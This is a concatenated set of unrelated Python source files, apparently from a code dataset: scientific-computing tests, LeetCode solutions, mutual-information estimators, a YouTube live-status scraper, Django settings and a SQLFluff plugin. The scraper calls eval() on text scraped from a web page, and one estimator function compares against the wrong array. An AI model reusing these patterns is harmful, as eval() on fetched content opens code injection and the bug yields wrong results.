dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").getDataArrayProxy(\"y\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").getDataArrayProxy(\"z\").Flag = 2\n err = d3d.remove_arrays(dca, dcap)\n if err < 0:\n print(\"Remove Arrays #1 - ErrorCondition: %d\" % err)\n\n # Combine Attribute Arrays #2:\n selectedDataArrayPaths = [simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V0\"), \n simpl.DataArrayPath(\"DataContainer\", 
\"QuadList\", \"V1\"), simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V2\"), \n simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V3\")]\n err = d3d.combine_attribute_arrays(dca, selectedDataArrayPaths, \"Quads\", False)\n if err < 0:\n print(\"Combined Attribute Arrays #2 - ErrorCondition: %d\" % err)\n\n # Delete Data # 2\n dcap = simpl.DataContainerArrayProxy()\n dcap.getDataContainerProxy(\"DataContainer\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V0\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V1\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V2\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V3\").Flag = 2\n err = d3d.remove_arrays(dca, dcap)\n if err < 0:\n print(\"Remove Arrays #2 - ErrorCondition: %d\" % err)\n\n # Create Geometry\n err = sc.CreateGeometry(dca, 0, simpl.IGeometry.Type.Quad, \"DataContainer\", False, \n shared_vertex_list_array_path = simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"Vertices\"),\n shared_quad_list_array_path = simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"Quads\"),\n vertex_attribute_matrix_name = \"VertexData\",\n face_attribute_matrix_name = \"FaceData\")\n if err < 0:\n print(\"Create Geometry - ErrorCondition: %d\" % err)\n\n err = d3d.data_container_writer(dca, sd.GetTestTempDirectory() + \"/CreateQuadGeometry.dream3d\", True, False)\n if err < 0:\n print(\"DataContainerWriter ErrorCondition: %d\" % err)\n\n\"\"\"\nMain entry point for python script\n\"\"\"\nif __name__ == \"__main__\":\n CreateQuadGeometryTest()\n","sub_path":"Wrapping/Python/Testing/Create_Quad_Geometry.py","file_name":"Create_Quad_Geometry.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"637926457","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport pytest # noqa: F401\nimport numpy as np # noqa: F401\nimport awkward as ak # noqa: F401\n\n\ndef test_flatten():\n content = ak.layout.NumpyArray(\n np.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])\n )\n offsets = ak.layout.Index64(np.array([0, 3, 3, 5, 6, 10], dtype=np.int64))\n array = ak.layout.ListOffsetArray64(offsets, content)\n\n assert ak.to_list(array) == [\n [0.0, 1.1, 2.2],\n [],\n [3.3, 4.4],\n [5.5],\n [6.6, 7.7, 8.8, 9.9],\n ]\n assert ak.to_list(array.flatten(axis=1)) == [\n 0.0,\n 1.1,\n 2.2,\n 3.3,\n 4.4,\n 5.5,\n 6.6,\n 7.7,\n 8.8,\n 9.9,\n ]\n assert ak.to_list(array.flatten(axis=-1)) == [\n 0.0,\n 1.1,\n 2.2,\n 3.3,\n 4.4,\n 5.5,\n 6.6,\n 7.7,\n 8.8,\n 9.9,\n ]\n with pytest.raises(ValueError) as err:\n assert ak.to_list(array.flatten(axis=-2))\n assert str(err.value).startswith(\"axis=0 not allowed for flatten\")\n\n array2 = array[2:-1]\n assert ak.to_list(array2.flatten(axis=1)) == [3.3, 4.4, 5.5]\n assert ak.to_list(array2.flatten(axis=-1)) == [3.3, 4.4, 5.5]\n","sub_path":"tests/test_0042-stubs-for-flatten-operation.py","file_name":"test_0042-stubs-for-flatten-operation.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
+{"seq_id":"364210824","text":"__author__ = 'zhy'\n\n\nclass Solution(object):\n @staticmethod\n def multiply(num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n res = [0] * (len(num1) + len(num2))\n\n for i, v1 in enumerate(reversed(num1)):\n for j, v2 in enumerate(reversed(num2)):\n res[i + j] += (int(v1) * int(v2))\n res[i + j + 1] += res[i + j] // 10\n res[i + j] %= 10\n\n while len(res) > 1 and res[-1] == 0:\n res.pop()\n return ''.join(reversed(list(map(str, res))))\n\n\ndef test():\n a = [('234', '2345')]\n for i1, i2 in a:\n print(Solution.multiply(i1, i2), ' vs ', int(i1) * int(i2))\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"Multiply Strings.py","file_name":"Multiply Strings.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"390553036","text":"# @Author: mario\n# @Date: 2019-01-07T17:03:06+01:00\n# @Last modified by: mario\n# @Last modified time: 2019-01-07T17:16:55+01:00\n\n\nimport abc\nfrom functools import partial\nfrom multiprocessing import Pool\n\nimport numpy as np\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy.special import digamma\nfrom sklearn.neighbors import KDTree\nfrom sklearn.preprocessing import normalize, scale\n\n\nclass MIEstimator(metaclass=abc.ABCMeta):\n def __init__(self):\n pass\n\n @abc.abstractmethod\n def estimateConditionalMI(self, X, Y, Z):\n \"\"\"\n In the context of feature selection, X is the feature to be added\n or deleted, Y is the response (either categorical for classification\n or numerical for regression) and Z is the matrix of the other features\n \"\"\"\n pass\n\n @abc.abstractmethod\n def estimateMI(self, X, Y, Z):\n pass\n\n\nclass EntropyMIEstimator(MIEstimator):\n \"\"\"\n Basic 3H MIEstimator.\n \"\"\"\n\n def __init__(self, entropyEstimator):\n self.entropyEstimator = entropyEstimator\n\n def estimateMI(self, X, Y):\n h_x = self.entropyEstimator.estimateFromData(X)\n h_y = self.entropyEstimator.estimateFromData(Y)\n h_xy = self.entropyEstimator.estimateJoint([X, Y])\n return h_x + h_y - h_xy\n\n def estimateConditionalMI(self, X, Y, Z):\n h_xz = self.entropyEstimator.estimateJoint([X, Z])\n h_yz = self.entropyEstimator.estimateJoint([Y, Z])\n h_xyz = self.entropyEstimator.estimateJoint([X, Y, Z])\n h_z = self.entropyEstimator.estimateFromData(Z)\n return h_xz + h_yz - h_xyz - h_z\n\n\ndef distanceInNorm(x, y, norm):\n return np.linalg.norm(x - y, norm)\n\n\ndef computeMIforSample(i, XYZ, XZ, YZ, Z, norm, k):\n dists = np.array(list(map(\n lambda z: np.linalg.norm(XYZ[i] - z, norm),\n np.delete(XYZ, i, axis=0))))\n idx = np.argpartition(dists, k-1)[k-1]\n epsI = dists[idx]\n\n distsXZ = np.array(list(map(\n lambda z: np.linalg.norm(XZ[i] - z, norm),\n np.delete(XZ, i, axis=0))))\n nXZ = np.sum(distsXZ < epsI) + 1\n\n distsYZ = np.array(list(map(\n lambda z: np.linalg.norm(YZ[i] - z, norm),\n np.delete(XZ, i, axis=0))))\n nYZ = np.sum(distsYZ < epsI) + 1\n distsZ = np.array(list(map(\n lambda z: np.linalg.norm(Z[i] - z, norm),\n np.delete(Z, i, axis=0))))\n nZ = np.sum(distsZ < epsI) + 1\n print(\"Old eps: {0}, nXZ: {1}, nYZ: {2}, nZ:{3}\".format(\n epsI, nXZ, nYZ, nZ))\n return digamma(nXZ) + digamma(nYZ) - digamma(nZ)\n\n\nclass MixedRvMiEstimator(MIEstimator):\n \"\"\"\n An estimator of the mutual information based on the local estimate of\n the Radon-Nikodym derivative. 
For more information see:\n https://papers.nips.cc/paper/7180-estimating-mutual-information-for-discrete-continuous-mixtures.pdf\n \"\"\"\n\n def __init__(self, num_neighbors, norm=2, nproc=1):\n super().__init__()\n self.k = num_neighbors\n self.norm = norm\n self.nproc = nproc\n\n @staticmethod\n def firstNonZero(vec):\n mask = (vec != 0)\n return np.where(mask.any(axis=0), mask.argmax(axis=0), -1)\n\n def estimateConditionalMI(self, X, Y, Z):\n \"\"\"\n I(X;Y|Z) = I(X,Z; Y) - I(Z; Y)\n \"\"\"\n if X.ndim == 1:\n X = X.reshape(-1, 1)\n if Y.ndim == 1:\n Y = Y.reshape(-1, 1)\n if Z.ndim == 1:\n Z = Z.reshape(-1, 1)\n\n XYZ = np.hstack((X, Y, Z))\n XZ = np.hstack((X, Z))\n YZ = np.hstack((Y, Z))\n nSamples = X.shape[0]\n\n XYZdists = squareform(pdist(XYZ))\n XZTree = KDTree(XZ)\n YZTree = KDTree(YZ)\n ZTree = KDTree(Z)\n partialMis = np.zeros(nSamples)\n\n for i in range(nSamples):\n dists = np.array(XYZdists[i, ])\n idx = np.argpartition(dists, self.k-1)[self.k-1]\n epsI = dists[idx]\n\n nXZ = XZTree.query_radius(\n XZ[i].reshape(1, -1), epsI, count_only=True)\n nYZ = YZTree.query_radius(\n YZ[i].reshape(1, -1), epsI, count_only=True)\n nZ = ZTree.query_radius(Z[i].reshape(1, -1), epsI, count_only=True)\n\n partialMis[i] = digamma(nXZ) + digamma(nYZ) - digamma(nZ)\n\n return digamma(self.k) - np.sum(partialMis) / nSamples\n\n def estimateMI(self, X, Y):\n nSamples = X.shape[0]\n out = 0\n if X.ndim == 1:\n X = X.reshape(-1, 1)\n if Y.ndim == 1:\n Y = Y.reshape(-1, 1)\n\n for i in range(nSamples):\n x_i = X[i]\n y_i = Y[i]\n distsX = np.array(list(map(\n lambda z: np.linalg.norm(x_i - z, self.norm),\n np.delete(X, i, axis=0))))\n distsY = np.array(list(map(\n lambda z: np.linalg.norm(y_i - z, self.norm),\n np.delete(Y, i, axis=0))))\n dists = np.maximum(distsX, distsY)\n idx = np.argpartition(dists, self.k-1)[self.k-1]\n distK = dists[idx]\n k = self.k if distK > 0 else self.firstNonZero(distK)\n nX = sum(distsX <= distK-1e-15) + 1\n # print('nX: {0}'.format(nX))\n nY = sum(distsY <= distK-1e-15) + 1\n # print('nY: {0}'.format(nY))\n out += (digamma(k) - digamma(nX) - digamma(nY)) / nSamples\n return out + np.log(nSamples)\n","sub_path":"src/algorithm/info_theory/mutual_information_kdtree.py","file_name":"mutual_information_kdtree.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"651336193","text":"from admin_module.user_module.director import Director\n\n__author__ = 'marcelo_garay'\n\n\nclass Movie(object):\n \"\"\"\n Creation of an instance of movie\n \"\"\"\n\n def __init__(self, title, story_line, release_year,\n id_actor=None, id_director=None):\n self.title = title\n self.story_line = story_line\n self.release_year = release_year\n self.rating = 0\n self.ranking = 0\n self.genres = \"\"\n self.rental_price = 0\n self.sell_price = 0\n self.quantity_available = []\n self.id_actor = id_actor\n self.id_director = id_director\n\n def _get_title(self):\n \"\"\"\n Get Title movie\n :return:\n \"\"\"\n return self.title\n\n def _get_story_line(self):\n \"\"\"\n Get Story line\n :return:\n \"\"\"\n return self.story_line\n\n def _get_release_year(self):\n \"\"\"\n Get Release year\n :return:\n \"\"\"\n return self.release_year\n","sub_path":"src/admin_module/catalogo_movie/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593292799","text":"import asyncio\nimport 
aiohttp\nfrom bs4 import BeautifulSoup\nimport re\nfrom tqdm import tqdm\nimport requests\n\ndef get(URL):\n return requests.get(URL).json()\n\n\n\nasync def main(uid):\n hed = {'Accept-Language': 'ja'}\n url = \"https://www.youtube.com/channel/\" + uid\n async with aiohttp.ClientSession(headers=hed) as session:\n async with session.get(url) as response:\n html = await response.text()\n parsed = BeautifulSoup(html, \"html.parser\")\n \n element_1 = parsed.find_all('script', text=re.compile(\"ライブ配信中\"))\n element_2 = parsed.find_all('script', text=re.compile(\"人が視聴中\"))\n\n if len(element_1) > 0 and len(element_2) > 0:\n for scrp in parsed.find_all(\"script\"):\n if \"window[\\\"ytInitialData\\\"]\" in scrp.text:\n dict_str = scrp.text.split(\" = \")[1]\n\n dict_str = dict_str.replace(\"false\",\"False\")\n dict_str = dict_str.replace(\"true\",\"True\")\n\n dict_str = dict_str.rstrip(\" \\n;\")\n\n dict_str = dict_str.replace(' window[\"ytInitialPlayerResponse\"]', '')\n dict_str = dict_str.replace(\";\", \"\")\n \n dics = eval(dict_str)\n break\n try:\n stream_description = dics[\"contents\"][\"twoColumnBrowseResultsRenderer\"][\"tabs\"][0]\\\n [\"tabRenderer\"][\"content\"][\"sectionListRenderer\"][\"contents\"][0]\\\n ['itemSectionRenderer']['contents'][0]\\\n ['channelFeaturedContentRenderer']['items'][0]\\\n ['videoRenderer']\n except KeyError:\n result = {'uid': uid, 'status': False}\n\n else:\n watch = stream_description['videoId']\n title = stream_description['title']['simpleText']\n print(title)\n result = {'watch': watch, 'title': title, 'uid': uid, 'status': True}\n else:\n result = {'uid': uid, 'status': False}\n return result\n\nBASE_URL = 'https://vtuber-livestatus-api.herokuapp.com/api/' \n\nall_liver = get(BASE_URL + 'vtuber/')\non_liver = get(BASE_URL + 'onlive/')\nif len(on_liver) != 0:\n on_livers = [liver['uid']['uid'] for liver in on_liver]\nelse:\n on_livers = []\n\nuids = [liver['uid'] for liver in all_liver]\n\n\nloop = asyncio.get_event_loop()\ndone,pending = loop.run_until_complete(\n asyncio.wait([main(uid) for uid in uids]))\n\nres = [d.result() for d in done] #結果\nlen(res)\n\n","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103356405","text":"import os\nfrom utils import *\nimport common\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nPROJECT_DIR = os.path.dirname(os.path.abspath(__file__))[:-5] # cut \"/conf\" from the end\nPROJECT_ROOT = os.path.realpath(os.path.dirname(__file__))\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': PROJECT_DIR + '/storage.sqlite', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. 
Not used with sqlite3.\n }\n}\n\nSTATIC_ROOT = PROJECT_DIR + '/static'\n\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\nEMAIL_SITE_ROOT_URL = \"http://localhost:8082\"\nEMAIL_FROM = \"pce.dev@gmail.com\"\n\nCONFIGURATIONS = {\n \"tst_config\" : ConfigurationInfo(\"Test Configuration\", \"graph_db.configurations.test_config.TestConfig\", PROJECT_DIR + \"/graph_db/databases/nxgraph.gpickle\"),\n \"tst_config2\" : ConfigurationInfo(\"Test Configuration 2\", \"graph_db.configurations.test_config.TestConfig\", PROJECT_DIR + \"/graph_db/databases/nxgraph2.gpickle\"),\n \"nsls2_magnets\" : ConfigurationInfo(\"NSLS 2 - Magnets configuration\", \"graph_db.configurations.nsls2_magnets.NSLS2Magnets\", PROJECT_DIR + \"/graph_db/databases/nsls2_magnets.gpickle\"),\n \"nsls2_magnets_test\" : ConfigurationInfo(\"Test NSLS 2 - Magnets configuration\", \"graph_db.configurations.nsls2_magnets.NSLS2Magnets\", PROJECT_DIR + \"/graph_db/databases/nsls2_magnets_test.gpickle\"),\n \"cxv2_config\" : ConfigurationInfo(\"CXV2 \", \"graph_db.configurations.cxv2_config.CXV2Config\", PROJECT_DIR + \"/graph_db/databases/cxv2_config.gpickle\"),\n}\n\ncommon.INSTALLED_APPS += [\n 'nsls_tools'\n]\n\ncommon.MENU_SOURCES += [\"nsls_tools.menu.MENU_ITEMS\", \"std_editor.menu.MENU_ITEMS\", \"cxv2_tools.menu.MENU_ITEMS\"]\n","sub_path":"conf/local_alexmak_hare.py","file_name":"local_alexmak_hare.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644341220","text":"\"\"\"This module integrates SQLFluff with diff_cover's \"diff-quality\" tool.\"\"\"\nfrom typing import List\n\nfrom diff_cover.hook import hookimpl as diff_cover_hookimpl\nfrom diff_cover.violationsreporters.base import BaseViolationReporter, Violation\n\nfrom sqlfluff.core import FluffConfig, Linter\n\n\nclass SQLFluffViolationReporter(BaseViolationReporter):\n \"\"\"Class that implements diff-quality integration.\"\"\"\n\n supported_extensions = [\"sql\"]\n\n def __init__(self):\n \"\"\"Calls the base class constructor to set the object's name.\"\"\"\n super().__init__(\"sqlfluff\")\n\n @staticmethod\n def violations(src_path: str) -> List[Violation]:\n \"\"\"Return list of violations.\n\n Given the path to a .sql file, analyze it and return a list of\n violations (i.e. formatting or style issues).\n \"\"\"\n linter = Linter(config=FluffConfig.from_root())\n linted_path = linter.lint_path(src_path, ignore_non_existent_files=True)\n result = []\n for violation in linted_path.get_violations():\n try:\n # Normal SQLFluff warnings\n message = f\"{violation.rule_code()}: {violation.description}\"\n except AttributeError:\n # Parse errors\n message = str(violation)\n result.append(Violation(violation.line_no, message))\n return result\n\n def measured_lines(self, src_path: str) -> None: # pragma: no cover\n \"\"\"Return list of the lines in src_path that were measured.\"\"\"\n\n\n@diff_cover_hookimpl\ndef diff_cover_report_quality() -> SQLFluffViolationReporter:\n \"\"\"Returns the SQLFluff plugin.\n\n This function is registered as a diff_cover entry point. 
diff-quality calls\n it in order to \"discover\" the SQLFluff plugin.\n\n :return: Object that implements the BaseViolationReporter ABC\n \"\"\"\n return SQLFluffViolationReporter()\n","sub_path":"src/sqlfluff/diff_quality_plugin.py","file_name":"diff_quality_plugin.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"350422766","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n for i, num in enumerate(nums):\n for j, num2 in enumerate(nums):\n if num + num2 == target and i != j:\n return [i, j]\n\n# completed 2022-11-20 (YYYY-MM-DD)\n# Runtime: 7868 ms, faster than 5.06% of Python3 online submissions for Two Sum.\n# Memory Usage: 15 MB, less than 80.28% of Python3 online submissions for Two Sum.\n# notes: not efficient at all but it works and i thought about it fast -- next time try to do it better\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n indexList = {}\n \n for i, num in enumerate(nums):\n if (target-num in indexList):\n return [i, indexList[target-num]]\n \n indexList[num] = i\n\n# completed 2022-11-24 (YYYY-MM-DD)\n# Runtime: 162 ms, faster than 33.26% of Python3 online submissions for Two Sum.\n# Memory Usage: 15.1 MB, less than 54.52% of Python3 online submissions for Two Sum.\n# notes: a better linear solution! uses dictionary. got some help with figuring out this one...\n","sub_path":"completed/leetcode/can-optimize/1-two-sum.py","file_name":"1-two-sum.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"296318961","text":"# pyright: reportMissingTypeStubs=false\nfrom src.Model.OvRClassifier import OvRClassifier\nfrom typing import List\nfrom .Mathematics.Matrix import Matrix\nimport logging, argparse, csv\nfrom .IO.ModelRepositoryFactory import model_data_repo_factory\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s-%(levelname)s %(name)s:%(message)s')\nlogger = logging.getLogger('run')\n\ndef load_data(file_name: str) -> Matrix:\n logger.debug(f\"Loading data from: {file_name}\")\n rgbs: List[List[int]] = []\n\n with open(file_name, 'r') as f:\n reader = csv.reader(f)\n for r, g, b in reader:\n rgbs.append([int(r), int(g), int(b)])\n\n return Matrix(rgbs).rtocol()\n\n\ndef load_model(modelName: str):\n model_repo = model_data_repo_factory.get_repo(modelName)\n layers = model_repo.read()\n return layers\n\n\ndef runFromFile(model_name: str, input_data: str):\n model = load_model(model_name)\n inputs = load_data(input_data)\n inputs = inputs.divide(255)\n logger.debug(f\"Running model: {model_name}\")\n results = OvRClassifier.run_model(model, inputs)\n\n print(results)\n\n\ndef runFromRgb(model_name: str, rgb: List[int]):\n model = load_model(model_name)\n inputs = Matrix([[rgb[0]], [rgb[1]], [rgb[2]]])\n inputs = inputs.divide(255)\n logger.debug(f\"Running model: {model_name}\")\n results = OvRClassifier.run_model(model, inputs)\n print(f\"RGB {rgb} is {results[0]}\")\n\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Runs the Neural Network\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument('--file', type=str, help=\"Use data from csv file (R,G,B) without header. 
\")\n group.add_argument('--rgb', type=int, nargs=3, help=\"RGB values ([0-255] [0-255] [0-255])\")\n parser.add_argument('modelName', type=str)\n\n args = parser.parse_args()\n print(args)\n if args.file != None :\n runFromFile(args.modelName, args.file)\n elif args.rgb != None:\n runFromRgb(args.modelName, args.rgb)\n","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"172546100","text":"#Faça um Programa que peça o raio de um círculo, calcule e mostre sua área.\n\nraio = input(\"Informe o valor do raio: \")\n\nr = float(raio)\npi = float(3.14)\n\narea = pi * (r**2)\n\nprint (\"Valor da area\", area)","sub_path":"estruturaSequencial/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"117189887","text":"\"\"\"NOTE: This file is Python 3.7 compatible for Blender 2.9X use.\"\"\"\n__all__ = [\"BinderError\", \"BaseBinder\", \"BinderHashTable\"]\n\nimport abc\nimport io\nimport json\nimport logging\nimport typing as tp\nfrom pathlib import Path\n\nfrom soulstruct.base.game_file import GameFile, InvalidGameFileTypeError\nfrom soulstruct.containers.entry import BinderEntry\nfrom soulstruct.containers.flags import BinderFlags\nfrom soulstruct.utilities.binary import BinaryReader, BinaryStruct\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass BinderError(Exception):\n pass\n\n\nclass BaseBinder(GameFile, abc.ABC):\n \"\"\"Base class for both BND and BXF (BHD/BDT) binder files.\"\"\"\n\n # `EXT` depends on files contained in binder.\n EXTRA_MANIFEST_FIELDS: tp.Tuple[str] = () # fields beyond `signature`, `flags`, `big_endian`, and `bit_big_endian`\n BinderEntry = BinderEntry # for convenience\n\n signature: str\n flags: BinderFlags\n big_endian: bool\n bit_big_endian: bool\n\n def __init__(self, file_source: GameFile.Typing = None, dcx_magic=(), **kwargs):\n self.signature = \"\"\n self.flags = BinderFlags(0) # no other sensible default\n self.big_endian = False\n self.bit_big_endian = False\n self._entries = [] # type: tp.List[BinderEntry]\n super().__init__(file_source, dcx_magic=dcx_magic, **kwargs)\n\n def _handle_other_source_types(self, file_source, **kwargs) -> tp.Optional[BinaryReader]:\n \"\"\"A BND can also be loaded from a `binder_manifest.json` file or a directory containing such a file.\"\"\"\n\n if isinstance(file_source, (str, Path)):\n file_source = Path(file_source)\n if file_source.is_dir() and (file_source / \"binder_manifest.json\").exists():\n file_source = file_source / \"binder_manifest.json\" # go to below\n if file_source.is_file() and file_source.name == \"binder_manifest.json\":\n directory = file_source.parent\n if directory.suffix == \".unpacked\": # only this suffix is automatically removed\n self.path = directory.with_name(directory.name[:-9])\n else:\n self.path = directory # writing this path will conflict with this unpacked folder source\n self.load_unpacked_dir(directory)\n return\n\n raise InvalidGameFileTypeError(\n f\"`file_source` is not a `binder_manifest.json` file or directory containing one.\"\n )\n\n def add_entry(self, entry: BinderEntry):\n if entry in self._entries:\n raise BinderError(f\"Given `BinderEntry` instance with ID {entry.id} is already in this binder.\")\n if entry.id in self.entries_by_id:\n _LOGGER.warning(f\"Entry ID {entry.id} appears more than once in this binder. 
You should fix this!\")\n self._entries.append(entry)\n\n def remove_entry(self, id_or_path_or_basename):\n if isinstance(id_or_path_or_basename, int):\n entry = self.entries_by_id[id_or_path_or_basename]\n elif isinstance(id_or_path_or_basename, str):\n try:\n entry = self.entries_by_path[id_or_path_or_basename]\n except KeyError:\n entry = self.entries_by_basename[id_or_path_or_basename]\n else:\n raise TypeError(\"Entry to be removed should be a binder entry ID (int) or path/basename (str).\")\n self._entries.remove(entry)\n\n def clear_entries(self):\n \"\"\"Remove all entries from the BND.\"\"\"\n self._entries.clear()\n\n @abc.abstractmethod\n def get_json_header(self) -> tp.Dict[str, tp.Any]:\n ...\n\n def load_unpacked_dir(self, directory):\n \"\"\"Load binder from a Soulstruct-unpacked directory containing a `binder_manifest.json` file.\"\"\"\n directory = Path(directory)\n if not directory.is_dir():\n raise ValueError(f\"Could not find unpacked binder directory {repr(directory)}.\")\n with (directory / \"binder_manifest.json\").open(\"r\", encoding=\"shift-jis\") as f:\n manifest = json.load(f)\n for field, value in self.get_manifest_header(manifest).items():\n setattr(self, field, value)\n self.add_entries_from_manifest(manifest[\"entries\"], directory, manifest[\"use_id_prefix\"])\n\n def get_manifest_header(self, manifest: tp.Dict) -> tp.Dict[str, tp.Any]:\n \"\"\"Extract manifest header data from given `manifest` dictionary and parse them into appropriate types.\n\n Other keys may be present in `manifest`, and will be ignored.\n \"\"\"\n if \"version\" not in manifest:\n raise BinderError(\"JSON manifest file does not contain 'version' key.\")\n if manifest[\"version\"] not in [base.__name__ for base in self.__class__.__bases__]:\n raise BinderError(\n f\"Version of file ({manifest['version']}) does not match \"\n f\"`BaseBinder` child class name ({self.__class__.__name__}).\"\n )\n loaded_manifest = {\n \"dcx_magic\": tuple(manifest[\"dcx_magic\"]),\n \"signature\": manifest[\"signature\"],\n \"flags\": BinderFlags(manifest[\"flags\"]),\n \"big_endian\": manifest[\"big_endian\"],\n \"bit_big_endian\": manifest[\"bit_big_endian\"],\n }\n for field in self.EXTRA_MANIFEST_FIELDS:\n loaded_manifest[field] = manifest[field]\n return loaded_manifest\n\n def add_entries_from_manifest(self, entries: tp.Dict, directory: tp.Union[str, Path], use_id_prefix: bool):\n directory = Path(directory)\n unsorted_entries = {} # maps ID to `(path, data, flags)` tuple\n for root, entry_dicts in entries.items():\n for entry in entry_dicts:\n find_entry_basename = f\"__{entry['id']}__{entry['name']}\" if use_id_prefix else entry['name']\n with (directory / find_entry_basename).open(\"rb\") as entry_file:\n entry_data = entry_file.read()\n unsorted_entries[entry['id']] = (f\"{root}\\\\{entry['name']}\", entry_data, entry['flags'])\n for entry_id, (path, data, flags) in sorted(unsorted_entries.items()):\n self.add_entry(BinderEntry(entry_id=entry_id, path=path, data=data, flags=flags))\n\n def write_unpacked_dir(self, directory=None):\n if not self.flags.has_names:\n raise NotImplementedError(\n \"Writing unpacked binder directories is only supported for binder formats with path strings.\"\n )\n if directory is None:\n if self.path:\n directory = self.path.with_suffix(self.path.suffix + \".unpacked\")\n else:\n raise ValueError(\"Cannot detect `directory` for unpacked binder automatically.\")\n else:\n directory = Path(directory)\n directory.mkdir(parents=True, exist_ok=True)\n\n entry_tree_dict = 
{}\n use_index_prefix = self.has_repeated_entry_names\n\n for i, entry in enumerate(self._entries):\n entry_directory = str(Path(entry.path).parent) # no trailing backslash\n entry_dict = {\"flags\": entry.flags, \"id\": entry.id if self.flags.has_ids else i, \"name\": entry.name}\n entry_tree_dict.setdefault(entry_directory, []).append(entry_dict)\n entry_file_name = f\"__{entry.id}__{entry.name}\" if use_index_prefix else entry.name\n with (directory / entry_file_name).open(\"wb\") as f:\n f.write(entry.data)\n\n json_dict = self.get_json_header()\n json_dict[\"entries\"] = entry_tree_dict\n\n # NOTE: Binder manifest is always encoded in shift-JIS, not `shift_jis_2004`.\n with (directory / \"binder_manifest.json\").open(\"w\", encoding=\"shift-jis\") as f:\n json.dump(json_dict, f, indent=4)\n\n @classmethod\n def detect(cls, binder_source: GameFile.Typing) -> bool:\n \"\"\"Returns True if `binder_source` appears to be this subclass of `BaseBinder`. Does not support DCX sources.\"\"\"\n if isinstance(binder_source, (str, Path)):\n binder_path = Path(binder_source)\n if binder_path.is_file() and binder_path.name == \"binder_manifest.json\":\n binder_path = binder_path.parent\n if binder_path.is_dir():\n try:\n with (binder_path / \"binder_manifest.json\").open(\"rb\") as f:\n return json.load(f)[\"version\"] == cls.__name__ # \"BND3\" or \"BND4\"\n except FileNotFoundError:\n return False\n elif binder_path.is_file():\n reader = BinaryReader(binder_path)\n try:\n version = reader.unpack_string(length=4, encoding=\"ascii\")\n except ValueError:\n return False\n if version[:3] in {\"BHF\", \"BDF\"}:\n version = f\"BXF{version[3]}\" # BXF header or data file\n return version == cls.__name__\n return False\n elif isinstance(binder_source, (bytes, io.BufferedIOBase)):\n binder_source = BinaryReader(binder_source)\n\n if isinstance(binder_source, BinaryReader):\n with binder_source.temp_offset(0):\n try:\n version = binder_source.unpack_string(length=4, encoding=\"ascii\")\n except ValueError:\n return False\n if version[:3] in {\"BHF\", \"BDF\"}:\n version = f\"BXF{version[3]}\" # BXF header or data file\n return version == cls.__name__\n\n raise TypeError(f\"Cannot detect 